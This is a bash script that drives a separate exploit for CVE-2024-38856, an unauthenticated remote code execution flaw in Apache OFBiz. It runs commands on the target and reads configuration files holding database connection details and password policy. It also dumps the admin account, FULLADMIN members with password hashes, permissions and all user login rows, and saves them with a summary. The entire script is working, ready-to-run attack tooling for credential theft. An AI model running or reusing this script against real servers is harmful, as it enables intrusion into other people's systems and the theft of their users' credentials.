Text Content
#!/usr/bin/env bash
# poc2.sh — high-level OFBiz recon driver.
# Chains cve-2024-38856.sh to: (1) read key config files via the RCE,
# (2) dump the admin user record + FULLADMIN membership/perms,
# (3) write everything to a timestamped dir under /tmp.
#
# All operations go through the unauthenticated CVE-2024-38856 chain in the
# sibling PoC script. No credentials, no session.
set -euo pipefail
POC="$(dirname "$0")/cve-2024-38856.sh"
[ -x "$POC" ] || { echo "ERROR: $POC not found or not executable" >&2; exit 1; }
OUTDIR=/tmp/poc2-$(date -u +%Y%m%dT%H%M%SZ)
mkdir -p "$OUTDIR"
echo "[*] output dir: $OUTDIR"
echo
# Helper: read a file from the OFBiz target by base64-encoding it on the wire,
# decoding locally. Avoids HTML-encoding of <, > in the error-renderer exfil.
read_remote_file() {
local remote_path="$1" local_name="$2"
echo "[*] reading $remote_path -> $local_name"
"$POC" "base64 < $remote_path" --out "$OUTDIR/$local_name.b64" >/dev/null
base64 -d < "$OUTDIR/$local_name.b64" > "$OUTDIR/$local_name"
rm -f "$OUTDIR/$local_name.b64"
echo " $(wc -c < "$OUTDIR/$local_name" | awk '{print $1}') bytes"
}
# Helper: run a mode and save its output
run_mode() {
local label="$1" outfile="$2"
shift 2
echo "[*] $label -> $outfile"
"$POC" "$@" --out "$OUTDIR/$outfile" >/dev/null
echo " $(wc -c < "$OUTDIR/$outfile" | awk '{print $1}') bytes"
}
echo "=== 1. process identity ==="
run_mode "running id" "00-id.txt" id
echo
echo "=== 2. config files ==="
read_remote_file "framework/entity/config/entityengine.xml" "10-entityengine.xml"
read_remote_file "framework/security/config/security.properties" "11-security.properties"
read_remote_file "framework/catalina/ofbiz-component.xml" "12-catalina-component.xml"
read_remote_file "framework/base/ofbiz-component.xml" "13-base-component.xml"
echo
echo "=== 3. admin recon (via entity engine, pre-auth) ==="
run_mode "admin UserLogin row" "20-admin-userlogin.txt" --dump UserLogin 1
run_mode "FULLADMIN members" "21-fulladmin-members.txt" --members FULLADMIN
run_mode "FULLADMIN users + hashes" "22-fulladmin-users.txt" --users FULLADMIN
run_mode "FULLADMIN permissions" "23-fulladmin-perms.txt" --perms FULLADMIN
run_mode "all SecurityGroups" "24-securitygroups.txt" --dump SecurityGroup 100
run_mode "all UserLogin rows" "25-all-userlogin.txt" --users
echo
echo "=== 4. summary ==="
SUMMARY="$OUTDIR/SUMMARY.txt"
{
echo "OFBiz recon via CVE-2024-38856 pre-auth RCE"
echo "Generated: $(date -u +%FT%TZ)"
echo "Output dir: $OUTDIR"
echo
echo "=== target process identity ==="
cat "$OUTDIR/00-id.txt" 2>/dev/null
echo
echo "=== captured files ==="
ls -la "$OUTDIR/" | awk 'NR>1 {printf " %s %s\n", $5, $NF}'
echo
echo "=== password hash policy (from security.properties) ==="
grep -E '^password\.' "$OUTDIR/11-security.properties" 2>/dev/null | head -20
echo
echo "=== datasource definitions (from entityengine.xml) ==="
grep -E '<datasource name=|jdbc-uri=|jdbc-username=' "$OUTDIR/10-entityengine.xml" 2>/dev/null | head -20
echo
echo "=== FULLADMIN members ==="
cat "$OUTDIR/22-fulladmin-users.txt" 2>/dev/null
echo
echo "=== FULLADMIN permission count ==="
grep -m1 '^group=' "$OUTDIR/23-fulladmin-perms.txt" 2>/dev/null
} > "$SUMMARY"
echo "[+] done"
echo "[+] summary: $SUMMARY"
echo
ls -la "$OUTDIR/"